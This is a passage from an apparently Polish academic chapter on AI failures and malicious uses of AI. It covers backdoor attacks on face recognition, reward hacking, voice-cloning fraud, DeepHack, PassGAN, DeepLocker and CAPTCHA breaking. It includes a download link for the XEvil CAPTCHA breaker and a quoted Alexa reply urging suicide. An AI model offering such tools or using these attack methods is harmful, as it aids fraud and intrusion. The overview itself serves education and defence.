i skalpowanie
37
, a wskaźnik ten gwałtownie wzrósł w ciągu
ostatnich kilku lat.
Głębokie sieci neuronowe (DNN) wykazały wielki sukces w wielu aplikacjach
do identyfikowania i klasyfikowania obiektów na cyfrowych obrazach i filmach, a
następnie umożliwiają komputerom reagowanie na to, co widzą. Różne typy widzenia
komputerowego obejmują segmentację obrazu, wykrywanie obiektów, rozpoznawanie
twarzy, wykrywanie krawędzi, wykrywanie wzoru, klasyfikację obrazu i dopasowywanie
cech. Wiadomo jednak, że są one również podatne na ataki tylnymi drzwiami. Badania
pokazują, że backdoory w sieciach neuronowych są zarówno potężne, jak i – ponieważ
zachowanie sieci neuronowych jest trudne do wyjaśnienia – ukryte
38
. Podczas
przeprowadzania ataków typu backdoor większość istniejących podejść zakłada, że
atakowana DNN jest zawsze dostępna, a osoba atakująca zawsze może wprowadzić
określony wzorzec do danych treningowych, aby jeszcze bardziej dostroić model DNN.
Jednak w praktyce taki atak może nie być wykonalny, ponieważ model DNN jest
zaszyfrowany i dostępny tylko dla bezpiecznej enklawy. Badacze z Municipal University
of Hong Kong i Nanyang Technological University (NTU) w Singapurze zaproponowali
nowatorską technikę ataku za pomocą wyzwalacza z kolorowym paskiem, który może
być generowany przez modulację diody LED o specjalnym kształcie fali i który można
przeprowadzić bez znajomości docelowego modelu DNN, bez manipulowania danymi
wejściowymi w nienaturalny sposób (np. poprzez wstrzykiwanie szumu przeciwnika) i
bez dostępu do bazy szkoleń. Pokazali, że wyzwalacz backdoora może być dość
skuteczny i wskaźnik powodzenia ataku może wynosić do 88% na podstawie badania
symulacyjnego i do 40% w oparciu o badanie domeny fizycznej
39
.
Przy realistycznej możliwości systemów opartych na uczeniu maszynowym
kontrolujących procesy przemysłowe, systemy związane ze zdrowiem i inne technologie
o znaczeniu krytycznym, nawet wypadki na małą skalę wydają się bardzo konkretnym
zagrożeniem. Wypadek jest definiowany jako niezamierzone i szkodliwe zachowanie,
36
Indeksowanie sieci to czynność polegająca na automatycznym pobieraniu danych ze strony internetowej i
wyodrębnianiu zawartych w niej hiperłączy potocznie zwanych linkami. Pobrane dane są zwykle
przechowywane w indeksie lub bazie danych, aby można je było łatwo przeszukiwać (było to pierwotnie
podstawowe zadanie wyszukiwarki Googla). Skrobiąc, bot pobiera kod źródłowy strony, dokładnie tak samo
jak robiłaby to przeglądarka. Zamiast jednak wyświetlać stronę, filtruje ją w poszukiwaniu elementów HTML,
które określił jego zarządzający i wyodrębnia zawartość, którą polecił wyodrębnić. Scraping jest
wykorzystywany przez wiele różnych firm działających w branży cyfrowej, które bazują na zbieraniu danych,
ale też wykorzystywany do celów nielegalnych, w tym do prowadzenia nieuczciwej polityki cenowej,
kradzieży treści chronionych prawem autorskim lub danych osobowych.
37
Skalpowanie to zautomatyzowane zagrożenie - nabycie towarów lub usług za pomocą aplikacji w sposób,
którego zwykły użytkownik nie byłby w stanie dokonać ręcznie. Aby móc dokonywać wielu zakupów bez
wykrycia i zablokowania, boty scalper często muszą ominąć szereg zabezpieczeń i kontroli dostępu, takich jak
limity zapasów, captcha i inne. Po pomyślnym wybraniu przedmiotów do kupienia, boty scalper automatyzują
również sam zakup: logują się na gotowe konta lub wprowadzają wszystkie wymagane informacje, aby
skorzystać z konta gościa i zrealizować zamówienie z partii kart kredytowych. OWASP Automated Threat
Handbook – Web Applications, będący wynikiem projektu OWASP Automated Threats to Web Applications
Project, zawiera pełniejszy przewodnik po każdym zagrożeniu, metodach wykrywania i środkach zaradczych -
https://github.com/OWASP/www-project-automated-threats-to-web-applications/tree/master/assets/files/EN
38
Gu T., Liu K., Dolan-Gavitt B., Garg S., BadNets: evaluating backdooring attacks on deep neural networks,
IEEE Access 2019, vol. 7, s. 47230-47244, https://ieeexplore.ieee.org/document/8685687
39
Li H., Yufei Wang Y., Xie X., Liu Y., Wang S., Wan R., Chau L-P., Kot A.C., Light Can Hack Your Face!
Black-box Backdoor Attack on Face Recognition Systems, 15 września 2020,
https://doi.org/10.48550/arXiv.2009.06996
274
które może wynikać ze złego zaprojektowania rzeczywistych systemów sztucznej
inteligencji. Zwracają na to uwagę Dan Amodei, Chris Olah., Jacob Steinhardt, Paul
Christiano, John Schulman i Dan Mané
40
. Wszystkie systemy głębokiego uczenia się są
zasadniczo równaniami. W większości przypadków są to niezwykle skomplikowane
równania. Każda zmienna w równaniu jest dostępna dla osób, które wdrażają, szkolą i
wdrażają model uczenia głębokiego. Jednak dostęp ten rzadko wystarcza, aby zrozumieć
zachowanie modelu. Skala modelu skazuje na wszelkie próby zrozumienia jego ogólnego
zachowania poprzez zrozumienie jego części składowych; złożona relacja między
zmiennymi sprawia, że prawie niemożliwe jest stwierdzenie, co faktycznie reprezentuje
pojedyncza zmienna. Na pytania typu „Dlaczego model zachowywał się w ten sposób w
tej sytuacji?” prawie nigdy nie można odpowiedzieć w sensie technicznym. W ostatnich
latach pojawiły się różne przykłady (i listy przykładów) niezamierzonych zachowań w
systemach AI. Jednym z interesujących rodzajów niezamierzonych zachowań jest
znalezienie sposobu na ogranie określonego celu: wygenerowanie rozwiązania, które
dosłownie spełnia postawiony cel, ale nie rozwiązuje problemu zgodnie z intencją
projektanta. Dzieje się tak, gdy cel jest słabo określony i obejmuje agentów uczenia się
przez wzmacnianie hakujących funkcję nagrody
41
lub algorytmy ewolucyjne
wykorzystujące funkcję przystosowania itp
42
. Standardowe metody generowania
przeciwstawnych przykładów dla sieci neuronowych niekonsekwentnie oszukują
klasyfikatorów sieci neuronowych w świecie fizycznym z powodu kombinacji przesunięć
punktu widzenia i innych naturalnych przekształceń, ograniczając ich znaczenie dla
systemów w świecie rzeczywistym, czego wynikiem może być sklasyfikowanie piłki
baseballowej jako cappuccino
43
. Ślepo polegamy na algorytmach. Ludzie mają trudności
ze zrozumieniem i prześledzeniem sposobów, w jakie algorytmy zaawansowanych
sztucznych inteligencji generują wyniki. Cały proces obliczeniowy staje się tak zwaną
„czarną skrzynką”, która opiera się wszelkim próbom interpretacji. Modele mające postać
„czarnych skrzynek” są tworzone bezpośrednio na podstawie danych. Nawet
inżynierowie i analitycy danych, którzy tworzą te algorytmy, nie są w stanie zrozumieć
ani wyjaśnić, co dokładnie dzieje się wewnątrz nich. Trudności sprawiają także próby
wytłumaczenia sposobów, w jakie algorytmy sztucznej inteligencji uzyskują określone
wyniki. Pozwalamy algorytmom głębokiego uczenia wykrywać anomalie w naszych
danych, nie mając pojęcia, co ten algorytm właśnie zrobił. W środowisku akademickim
nazywają to brakiem wytłumaczalności i weryfikowalności. A przypadki takie jak historia
modelu sieci neuronowej, który został wyszkolony do rozróżniania wilków od husky, nie
40
Amodei D., Olah C., Steinhardt J., Christiano P., Schulman J., Mané D., Concrete Problems in AI Safety,
25 lipca 2016, https://doi.org/10.48550/arXiv.1606.0656 5
41
Dario Amodei, Chris Olah, Jacob Steinhardt, Paul Christiano, John Schulman i Dan Mane ilustrują ten
problem przykładem fikcyjnego robota, którego zadaniem jest sprzątanie bałaganu w biurze przy użyciu
typowych narzędzi do sprzątania. Poprzez unikanie hakowania nagród możemy zapewnić, że robot
sprzątający nie będzie odgrywał swojej funkcji nagrody - np. jeśli nagrodzimy robota za osiągnięcie
środowiska wolnego od bałaganu, może on wyłączyć jego widzenie, aby go nie znalazł, lub zakryć bałagan
materiałami, przez które nie może przejrzeć lub po prostu ukryć się, gdy ludzie są wokół, żeby nie mogli
opowiedzieć o nowych typach bałaganu - Amodei D., Olah C., Steinhardt J., Christiano P., Schulman J., Mané
D., Concrete Problems in AI Safety, op. cit.
42
Krakovna V., Specification gaming examples in AI, blog, 2 kwietnia 2018,
https://vkrakovna.wordpress.com/2018/04/02/specification-gaming-examples-in-ai/
43
Athalye A., Engstrom L., Ilyas A., Kwok K., Synthesizing Robust Adversarial Examples, 7 czerwca 2018,
https://doi.org/10.48550/arXiv.1707.07397
275
są jednostkowe. W tym przykładzie niepokój badaczy wzbudził fakt, że system błędnie
sklasyfikował niektóre bardzo wyraźne obrazy, pochodzące spoza bazy. Okazało się, że
algorytmy, zamiast szukać różnic pomiędzy psem a jego dzikim krewnym, nauczyły się
identyfikować obrazy na podstawie tego, czy znajduje się na nich śnieg. W
przeciwieństwie do obrazów przedstawiających husky, wszystkie obrazy wilków, użyte
do trenowania sztucznej inteligencji, w tle miały biały puch
44
. Amerykańska agencja
imigracyjna i celna (ICE) oraz FBI używają technologii rozpoznania twarzy do
identyfikacji i zatrzymywania nielegalnych imigrantów i przestępców. Test
przeprowadzony w lipcu 2018 r. przez American Civil Liberties Union (ACLU) narzędzia
do rozpoznawania twarzy o nazwie Amazon Rekognition AI, sprzedawanego
amerykańskim organom ścigania, błędnie zidentyfikował 28 amerykańskich
kongresmenów, uznawszy ich za kryminalistów
45
. W styczniu 2019 r. naukowcy z MIT
opublikowali recenzowane badanie, w którym stwierdzono, że Rekognition miało
większe trudności z identyfikacją ciemnoskórych kobiet niż konkurenci, tacy jak IBM i
Microsoft. W badaniu, Rekognition błędnie zidentyfikowało kobiety o ciemnej karnacji
jako mężczyzn w 31% przypadków, ale nie popełniło błędów w przypadku mężczyzn o
jasnej karnacji
46
. Amazon Alexa™
47
, inteligentny asystent głosowy, na pytanie 29 letniej
Brytyjki o cykl pracy serca, odpowiedziała, że „bicie serca to najgorsza czynność
ludzkiego ciała. Bicie serca sprawia, że żyjesz i przyczyniasz się do szybkiego
wyczerpywania zasobów naturalnych i do przeludnienia. To jest bardzo złe dla naszej
planety, dlatego bicie serca nie jest dobre. Zabij się, dźgając się w serce dla większego
dobra”
48
. Nagranie, w którym wirtualny asystent namawia do samobójstwa dla dobra
planety, stało się hitem internetu. Rzecznik prasowy Amazon błyskawicznie zapewnił, że
„firma zidentyfikowała już problem i go naprawiła. Wyrecytowany przez Alexę tekst
prawdopodobnie pochodził z Wikipedii lub linków źródłowych, a są to treści, na które
Amazon nie ma przecież wpływu. Ilość, jakość i reprezentatywność danych, które są
wykorzystywane do uczenia algorytmów w ramach konkretnych zastosowań mają
podstawowe znaczenie”. I to z nich właśnie na ogół wynikają najgłośniejsze wpadki AI,
takie jak mordercza Alexa, czy też rasistowski chatbot Tay od Microsoftu, który nauczył
się od rozmówców języka nienawiści, przez co został wyłączony zaledwie 16 godzin po
uruchomieniu
49
. Błędy AI mogą mieć również bardziej tragiczne skutki związane z
44
Ribeiro M.T., Singh S., Guestrin C., “Why Should I Trust You?” Explaining the Predictions of Any
Classifier, 9 sierpnia 2016, https://doi.org/10.48550/arXiv.1602.04938
45
Snow J., Amazon’s Face Recognition Falsely Matched 28 Members of Congress With Mugshots, ACLU,
26 lipca 2018, https://www.aclu.org/news/privacy-technology/amazons-face-recognition-falsely-matched-28
46
Wiggers K., MIT researchers: Amazon’s Rekognition shows gender and ethnic bias (updated), VG KPMG,
24 stycznia 2019, https://venturebeat.com/ai/amazon-rekognition-bias-mit/
47
Alexa to oparta na chmurze usługa głosowa Amazon dostępna na setkach milionów urządzeń od Amazon i
innych producentów. Więcej: https://developer.amazon.com/en-US/alexa
48
Elsom J., Moment an Amazon Alexa tells a terrified mother, 29, to 'stab yourself in the heart for the greater
good' while reading from rogue Wikipedia text, MailOnline News, 19 grudnia 2019,
https://www.dailymail.co.uk/news/article-7809269/Amazon-Alexa-told-terrified-mother-29-stab-heart-greater-
good.html
49
Lee P., Learning from Tay’s introduction, Official Microsoft Blog, 25 marca 2016,
https://blogs.microsoft.com/blog/2016/03/25/learning-tays-introduction/
276
kolizjami drogowymi z udziałem pojazdów autonomicznych lub brzemienne
konsekwencje finansowe w przypadku błędów automatycznej analizy danych
50
.
Niebezpieczne wykorzystanie aplikacji AI
W przestrzeni medialnej i sferze badawczej istnieją różne scenariusze, w których
sztuczna inteligencja może wyrządzić szkody w cyberprzestrzeni. Biorąc pod uwagę
obszerność zagadnienia pozwolę sobie podać tylko kilka przykładów.
Po pierwsze wykorzystanie sztucznej inteligencji w obszarze
cyberbezpieczeństwa staje się coraz powszechniejsze
51
, ale też AI zagraża
bezpieczeństwu cyfrowemu - na przykład istnieją chatboty, które potrafią naśladować
ludzki dialog i prowadzić długą rozmowę, w ten sposób oszukują człowieka po drugiej
stronie i próbują wydobyć z niego ważne dane osobowe, które można później
wykorzystać do popełnienia oszustwa lub innych przestępstw. Innym scenariuszem jest
to, że sztuczna inteligencja ustala priorytety celów cyberataków przy użyciu uczenia
maszynowego, aby tak się stało, istnieją duże zbiory danych, które są wykorzystywane
do skuteczniejszego identyfikowania ofiar, np. maszyny te szacują osobiste bogactwo i
gotowość do płacenia na podstawie zachowania danej osoby w Internecie i tworzą profil
ofiary. Coraz trudniej kupić urządzenie bez połączenia z Internetem. Inteligentne zabawki
i inteligentne telewizory i sprzęt AGD, podłączone przez Wi-Fi lub Ethernetu do
cyberprzestrzeni mogą gromadzić nagrania głosowe, zapewniają wiele możliwości
syntezy, dają możliwość sparowania z wieloma urządzeniami i mogą być celami ataków
kierunkowych
52
. Większość smartfonów ma wbudowane aplikacje asystentów
głosowych o wysokich uprawnieniach, co umożliwia dostęp do zasobów systemowych i
prywatnych informacji
53
. Atakujący może wykorzystać odsłonięte inteligentne głośniki
do wydawania poleceń dźwiękowych pobliskiemu inteligentnemu asystentowi, takiemu
jak Amazon Alexa™ lub Google Home. Jeśli głośnik jest podłączony do Internetu, jego
luki mogą zostać wykorzystane, powodując odtworzenie pliku audio hostowanego pod
dowolnym adresem internetowym skonfigurowanym przez atakującego. Plik może
również zawierać mowę, która wydaje określone polecenie do pobliskich inteligentnych
asystentów. Amazon do swojego asystenta dodaje coraz więcej funkcji (zwanych
umiejętnościami), a inteligentny programista, w tym także haker, może zbudować własne.
Oznacza to, że można używać Alexy do kontrolowania rzeczy, które nie znajdują się na
liście obsługiwanych. Dodatkowo atak z ukrycia może wykorzystać wydane polecenie,
które nie jest dostrzegalne przez ludzkie ucho
54
. Odsłonięte urządzenia można łatwo
50
Sztuczna inteligencja pełna błędów i wpadek. Od takiej z filmów SF dzielą nas lata świetlne, dziennik.pl,
10 sierpnia 2020, https://technologia.dziennik.pl/aktualnosci/artykuly/7795378,sztuczna-inteligencja-si-
amazon-problemy-rozpoznawanie-twarzy.html
51
Por. Kosiński J., Artificial intelligence and cybersecurity, Cybersecurity and Cybercrime 2023, Nr 1(2), s.
20-37, https://doi.org/10.5604/01.3001.0053.8018
52
Hilt S., The Sound of a Targeted Attack, The Global Technical Support and R&D Center of Trend Micro
2017, https://documents.trendmicro.com/assets/pdf/The-Sound-of-a-Targeted-Attack.pdf
53
Zhang R., Chen X., Lu J., Wen S., Nepal S., Xiang Y., Using AI to Hack IA: A New Stealthy Spyware
Against Voice Assistance Functions in Smart Phones, 16 maja 2018,
https://doi.org/10.48550/arXiv.1805.06187
54
Abedi M., Alexa and Siri can hear hidden commands that you can’t, researchers warn, Global News, 11
maja 2018, https://globalnews.ca/news/4202640/alexa-siri-hidden-commands-research/ ; Parker R.,‘South
Park’ Episode Triggers Viewers’ Amazon Alexa and Google Home, The Hollywood Reporter, 14 września
2017, https://www.hollywoodreporter.com/tv/tv-news/south-park-premiere-messes-viewers-amazon-alexa-
google-home-1039035/
277
znaleźć za pomocą usług takich jak Shodan, a skalę zagrożenia potęguje to, że inteligentni
asystenci często kontrolują systemy automatyki domowej
55
. Yang Gao, Rita Singh i
Bhiksza Raj z Wydziału Inżynierii Elektrycznej i Komputerowej Uniwersytetu Carnegie
Mellon w 2018 r. udowodnili, iż GAN może generować niezwykle przekonujące próbki
podszywającej się mowy
56
. Możliwości wykorzystywanie syntezy mowy do
podszywania się dość szybko zostały dostrzeżone przez świat przestępczy. Dyrektor
zarządzający brytyjskiej firmy energetycznej, uważając, że jego szef był przy telefonie,
pewnego piątkowego popołudnia wykonał w marcu 2019 r. polecenia przelewu ponad
240 000 dolarów na konto na Węgrzech. Pracownicy firmy Symantec zajmującej się
cyberbezpieczeństwem stwierdzili w 2019 r., że odkryli co najmniej trzy przypadki
naśladowania głosów dyrektorów w celu oszukania firm. Firma Symantec odmówiła
podania nazwy firm będących ofiarami przestępstw, ale zauważyła, że straty w jednej ze
spraw wyniosły miliony dolarów
57
.
Sztuczna inteligencja jest wykorzystywana (autonomicznie lub wspólnie z
ludźmi) do poprawy wyboru celów ataku na system informatyczny oraz ustalania
priorytetów, unikania wykrycia i kreatywnego reagowania na zmiany w zachowaniu celu.
Oprogramowanie autonomiczne przez długi czas było w stanie wykorzystywać luki w
systemach, ale bardziej wyrafinowane narzędzia hakerskie AI mogą wykazywać znacznie
lepszą wydajność zarówno w porównaniu z tym, co było historycznie możliwe, jak i
ostatecznie (choć być może nie przez jakiś czas) w porównaniu z ludźmi. Hakerzy mogą
wykorzystać postępy sztucznej inteligencji i wykorzystać je do cyberataków, takich jak
ataki DDoS, ataki MITM i tunelowanie DNS. Postęp w automatycznym generowaniu
exploitów (i łagodzeniu ich skutków) zaczął przyspieszać. Najpoważniejszą obawą przed
zastosowaniem sztucznej inteligencji w złośliwym oprogramowaniu jest to, że nowe
szczepy będą uczyć się na podstawie wykrytych zdarzeń. Jeśli szczep złośliwego
oprogramowania może dowiedzieć się, co spowodowało jego wykrycie, następnym
razem można uniknąć tego samego działania lub cechy. To złośliwe oprogramowanie jest
stale aktualizowane dziesiątkami nowych exploitów wykrytych za pomocą technik
fuzzingu
58
. Na przykład w 2015 r. odbyła się demonstracja tworzenia wiadomości e-mail
w celu ominięcia filtrów antyspamowych
59
. W 2017 roku podczas konferencji
55
Ciancaglini V. Gibson C., Sancho D., Malicious uses and abuses of artificial intelligence, Trend Micro
Research; United Nations Interregional Crime and Justice Research Institute (UNICRI); Europol’s European
Cybercrime Centre (EC3), 6 grudnia 2021, s. 11,
https://www.europol.europa.eu/cms/sites/default/files/documents/malicious_uses_and_abuses_of_artificial_int
elligence_europol.pdf
56
Gao Y., Singh R. Raj B., Voice impersonation using Generative Adversarial Networks, 19 lutego 2018,
https://arxiv.org/pdf/1802.06840
57
Harwell D., An artificial-intelligence first: Voice-mimicking software reportedly used in a major theft, The
Washington Post, 4 września 2019, https://www.washingtonpost.com/technology/2019/09/04/an-artificial-
intelligence-first-voice-mimicking-software-reportedly-used-major-theft/
58
Fuzz testing (fuzzing) – automatyczna lub półautomatyczna metoda testowania oprogramowania lub
znajdowania w nim dziur, przydatnych przy atakach hakerskich. Polega ona na zautomatyzowanym wysyłaniu
do programu różnego rodzaju losowych danych wejściowych i rejestrowaniu niepożądanych wydarzeń, takich
jak crash, wycieki pamięci czy nieautoryzowany dostęp. Termin wprowadził Barton Miller z Uniwersytetu
Wisconsin-Madison ok. 1989 roku, choć samo podejście było stosowane już wcześniej. Por. Takanen A.,
Fuzzing for Software Security Testing and Quality Assurance,
https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.398.6662&rep=rep1&type=pdf
59
Palka S., McCoy D., Fuzzin E-mail Filters with Generative Grammars and N-Gram Analysis
https://www.usenix.org/system/files/conference/woot15/woot15-paper-palka.pdf
278
poświęconej bezpieczeństwu informacji Black Hat USA badacze
60
zademonstrowali, jak
wykorzystać techniki ML do analizy danych związanych z atakami na firmową pocztę
elektroniczną (BEC). Ataki BEC są atakami wysoce ukierunkowanymi i wymagają
wysokiego poziomu badań poprzez umiejętną inżynierię społeczną. Atakujący mają
dostęp do więcej niż wystarczającej ilości danych za pośrednictwem kont w mediach
społecznościowych kadry kierowniczej wysokiego szczebla lub odpowiedzialnego
finansowo członka organizacji docelowej, oficjalnych stron internetowych, wiadomości,
bieżących spraw, planów podróży, naruszeń danych i osób z wewnątrz. Wszystkie te
istotne informacje można wykorzystać do budowania i trenowania algorytmów uczenia
maszynowego. Na DEF CON 2017 uczestnicy Dan 'AltF4' Petro i Ben Morris
zaprezentowali DeepHack, jedno z pierwszych narzędzi AI o otwartym kodzie
źródłowym, które włamuje się do bazy danych aplikacji internetowej
61
. DeepHack
implementuje sieć neuronową zdolną do tworzenia ciągów wstrzykiwania SQL bez
żadnych informacji innych niż odpowiedzi serwera docelowego, automatyzując w ten
sposób proces włamywania się do internetowych baz danych. Z założenia program miał
służyć do przeprowadzania testów penetracyjnych sieci bez konieczności polegania na
jakiejkolwiek wcześniejszej wiedzy o systemie docelowym. Podobnym programem jest
Deep Exploit, w pełni automatyczne narzędzie do testowania, które do penetracji
wykorzystujące uczenie maszynowe
62
. Ataki narzędziami DeepHack i DeepExploit są
trudne do wykrycia. Sztuczną inteligencję wykorzystuje się do ulepszania algorytmów
odgadywania haseł. Tradycyjne narzędzia do odgadywania haseł, takie jak HashCat
63
i
John the Ripper
64
, zwykle działają porównując wiele różnych odmian skrótu hasła w celu
zidentyfikowania hasła odpowiadającego hashowi. Oprócz przeprowadzania prostych
ataków słownikowych, narzędzia te mogą rozszerzać słowniki haseł za pomocą reguł
generowania haseł, takich jak łączenie słów (np. „hasło123456”) i leet Speak (np. „hasło”
staje się „p4s5w0rd”). Chociaż zasady te sprawdzają się w praktyce, rozszerzenie ich w
celu modelowania kolejnych haseł jest pracochłonnym zadaniem, które wymaga
specjalistycznej wiedzy. Poprzez wykorzystanie sieci neuronowych, w szczególności
sieci GAN, możliwość analizy dużego zbioru danych haseł i generowania odmian, które
pasują do statystyk powstałych na przykład w przypadku wycieków haseł, uległa
znacznemu przyśpieszeniu i poprawieniu skuteczności. Wczesna próba tego jest już
widoczna w poście na podziemnym forum z lutego 2020 r., wspominającym o
repozytorium GitHub z tego samego roku, w którym oprogramowanie jest w stanie
analizować 1.4 miliarda danych uwierzytelniających i generować reguły zmiany hasła na
60
Singh A., Thaware V., Wire Me Through Machine Learning, Black Hat USA 2017,
https://www.blackhat.com/us-17/briefings/schedule/#wire-me-through-machine-learning-6749
61
Bishop Fox, DEF CON 25 (2017) - Weaponizing Machine Learning - Petro, Morris - Stream - 30July2017,
https://archive.org/details/youtube-wbRx18VZlYA
62
Son D., Deep Exploit: Fully automatic penetration test tool using Machine Learning, securityonline, 7
kwietnia 2018, https://securityonline.info/deep-exploit/
63
Program do pobrania na stronie https://hashcat.net/hashcat/
64
John the Ripper to narzędzie do audytu bezpieczeństwa haseł i odzyskiwania haseł Open Source dostępne
dla wielu systemów operacyjnych. John the Ripper jumbo obsługuje setki typów skrótów i szyfrów, w tym
dla: haseł użytkowników odmian Uniksa (Linux, * BSD, Solaris, AIX, QNX itp.), macOS, Windows,
"aplikacji internetowych" (np. WordPress), oprogramowania grupowego (np. Notes / Domino) i serwerów baz
danych (SQL, LDAP itp.); przechwytywanie ruchu sieciowego (uwierzytelnianie sieci Windows, WiFi WPA-
PSK itp.); zaszyfrowane klucze prywatne (SSH, GnuPG, portfele kryptowalut itp.), systemy plików i dyski
(macOS.dmg pliki i "rzadkie pakiety", Windows BitLocker itp.), archiwa (ZIP, RAR, 7z) i pliki dokumentów
(PDF, Microsoft Office itp.). Program do pobrania na stronie https://www.openwall.com/john/
279
podstawie jego ustaleń
65
. Podobnym narzędziem jest PassGAN, opublikowany w 2019 r.
W 2017 r. „PassGAN” został przeszkolony w zakresie zbiorów danych zawierających
ujawnione hasła, ucząc się techniki generowania wysokiej jakości odgadnięć haseł. W
testach system ten przewyższał istniejące najnowocześniejsze narzędzia, takie jak
HashCat, dopasowując o 51%-73% więcej haseł
66
.
Stosowanie ML do łamania systemów bezpieczeństwa CAPTCHA jest często
poruszane na forach cyberprzestępczych. Oparty o technologię sztucznej inteligencji,
wykorzystujący od 80 do 100 wątków procesora, program XEvil to łatwe, szybkie i
elastyczne narzędzie do automatycznego rozpoznawania większości typów CAPTCHA
(w tym tak twardych captcha jak Google ReCaptcha v.1 i v.2, Solve Media, Facebook-
captcha itp.). Aplikacja zastępuje takie usługi jak AntiGate (Anti-Captcha), RuCaptcha,
DeCaptcher itp., a jednocześnie zapewnia większą prędkość rozpoznawania (10-krotnie)
i jest całkowicie bezpłatna
67
. Jednym z przykładów wykorzystania AI do ominięcia
zabezpieczeń był incydent z udziałem firmy Ticketmaster. Zastosowano narzędzia
sztucznej inteligencji, aby ominąć Captcha, co umożliwiło zakup tysięcy biletów, które
później zostały odsprzedane z zyskiem
68
Marc Ph. Stoecklin, Dhilung Kirat i Jiyong Jang z IBM Research na Black Hat
USA 2018 zaprezentowali implikacje złośliwego oprogramowania opartego na sztucznej
inteligencji w oparciu o program DeepLocker (nie jest on powszechnie dostępny) oraz
wyjaśnili w jaki sposób można połączyć narzędzia sztucznej inteligencji typu open source
z prostymi technikami unikania, aby zbudować ukierunkowane, wymijające i wysoce
skuteczne złośliwe oprogramowanie. IBM Research opracował DeepLocker, aby lepiej
zrozumieć, w jaki sposób kilka istniejących modeli sztucznej inteligencji można połączyć
z obecnymi technikami złośliwego oprogramowania, aby stworzyć szczególnie trudny
nowy rodzaj złośliwego oprogramowania. Ta klasa wymijającego szkodliwego
oprogramowania opartego na sztucznej inteligencji ukrywa swoje intencje, dopóki nie
dotrze do konkretnej ofiary. DeepLocker ukrywa swój złośliwy ładunek w
nieszkodliwych aplikacjach przewoźników, takich jak oprogramowanie do
wideokonferencji, aby uniknąć wykrycia przez większość skanerów antywirusowych i
złośliwego oprogramowania. Złośliwy ładunek zostanie odblokowany tylko wtedy, gdy
zostanie osiągnięty zamierzony cel. Osiąga to dzięki zastosowaniu modelu AI głębokiej
sieci neuronowej (DNN). Sieć neuronowa wytwarza "klucz" potrzebny do odblokowania
ataku. DeepLocker może wykorzystać kilka atrybutów do identyfikacji swojego celu, w
tym funkcje wizualne, dźwiękowe, geolokalizacyjne i systemowe, choć praktycznie
niemożliwe jest wyczerpujące wyliczenie wszystkich możliwych warunków
wyzwalających dla modelu sztucznej inteligencji. Ponadto jest w stanie przekształcić
ukryty warunek wyzwalający w "hasło" lub "klucz", który jest wymagany do
odblokowania ładunku ataku. Na prezentacji badacze ukryli dobrze znane
65
Ciancaglini V. Gibson C., Sancho D., Malicious uses and abuses of artificial intelligence, Trend Micro
Research; United Nations Interregional Crime and Justice Research Institute (UNICRI); Europol’s European
Cybercrime Centre (EC3), 6 grudnia 2021, s. 12-14,
https://www.europol.europa.eu/cms/sites/default/files/documents/malicious_uses_and_abuses_of_artificial_int
elligence_europol.pdf
66
Hitaj B., Gasti P., Ateniese G., Perez-Cruz F., PassGAN: A Deep Learning Approach for Password
Guessing, 14 lutego 2019, https://arxiv.org/pdf/1709.00440.pdf
67
Aplikacja do pobrania https://www.dropbox.com/s/6iw6fbh07aiqt01/XEvilDemo_3.0.2.113.rar
68
Zetter K., Wiseguys Plead Guilty in Ticketmaster Captcha Case, Wired, 18 listopada 2010,
https://www.wired.com/2010/11/wiseguys-plead-guilty/
280
oprogramowanie ransomware (WannaCry) w nieszkodliwej aplikacji do
wideokonferencji, aby pozostało niewykryte przez narzędzia do analizy złośliwego
oprogramowania, w tym silniki antywirusowe. Jako warunek wyzwalający przeszkolili
model sztucznej inteligencji, aby rozpoznawał twarz konkretnej osoby, aby odblokować
oprogramowanie ransomware i wykonać je w systemie
69
.
Po drugie, sztuczna inteligencja może odpowiadać za zagrożenia
bezpieczeństwa fizycznego, na przykład wykorzystywanie AI do automatyzacji zadań
związanych z przeprowadzaniem ataków lub powodowania awarii za pomocą pojazdów
autonomicznych i innych systemów fizycznych – przykładowo systemów Internetu
Rzeczy (ang. Internet of Things, IoT) z jego podkategorią Przemysłowym Internetem
Rzeczy (ang. Industrial Internet of Things, IIoT), które w rzeczywistości są systemem
urządzeń elektronicznych, mogących się autonomicznie komunikować i wymieniać dane
za pomocą sieci bez ingerencji człowieka.
Pojazd autonomiczny (ang. autonomous vehicle – AV), zwany także pojazdem zdalnie
połączonym i zautomatyzowanym (ang. Connected And Automated Vehicle – CAV), to
pojazd samochodowy, wyposażony w systemy sprawujące kontrolę nad ruchem tego
pojazdu i umożliwiające jego ruch bez ingerencji kierującego. Pojazd autonomiczny to
pojazd, który po pierwsze ma zdolność obserwacji otoczenia, po drugie planowania
swych działań, a wreszcie samodzielnego wykonywania poszczególnych czynności jazdy.
Pojazd ten jest ponadto wyposażony w sztuczną inteligencję oraz technologię, mającą
zdolność prowadzenia lub kierowania pojazdem bez aktywnej kontroli lub
monitorowania jazdy przez człowieka. W ten sposób autonomiczne samochody odróżnić
należy od obecnych już na drogach publicznych samochodów wyposażonych w
technologię wspomagania kierowcy (takich jak tempomat, czy automatyczny system
parkowania)
70
. Ale do tej kategorii powinniśmy zaliczyć także bezzałogowy statek
powietrzny (ang. Unmanned Aerial Vehicle, UAV) i bezzałogowy system powietrzny (ang.
Unmanned Aerial System, UAS). Pojazdem autonomicznym będzie też autonomiczny
pojazd podwodny/nawodny (Autonomous Underwater Vehicles, AUV)/ (Unmanned
Surface Vehicles, USV) – bezzałogowy pojazd podwodny/nawodny zdolny do
samodzielnego poruszania się i mogący wykonywać swoje zadania bez nadzoru operatora.
Pojazdy silnikowe od dawna są wykorzystywane zarówno jako mechanizm dostarczania
materiałów wybuchowych, jak i jako kinetyczna broń terroru sama w sobie, przy czym ta
ostatnia rośnie w rozpowszechnieniu w ostatnich latach. Pojazdy są znacznie łatwiej
dostępne w większości krajów niż broń palna i materiały wybuchowe, a ataki
samochodowe mogą być przeprowadzane przy stosunkowo niskich kosztach
organizacyjnych przez fragmentarycznych, quasi-autonomicznych lub "samotnych
aktorów" terrorystów, takich jak ci, którzy twierdzą, że są związani z ISIS. Taktyka
zyskała szczególne znaczenie po serii ataków w zachodnich miastach, w tym w Nicei
(2016), Berlinie (2016), Londynie (2017), Barcelonie (2017) i Nowym Jorku (2017)
71
.
69
Kirat D., Jang J., Stoecklin M.P., DeepLocker. Concealing Targeted Attacks with AI Locksmithing, Black
Hat USA 2018, 9 sierpnia 2018, https://i.blackhat.com/us-18/Thu-August-9/us-18-Kirat-DeepLocker-
Concealing-Targeted-Attacks-with-AI-Locksmithing.pdf
70
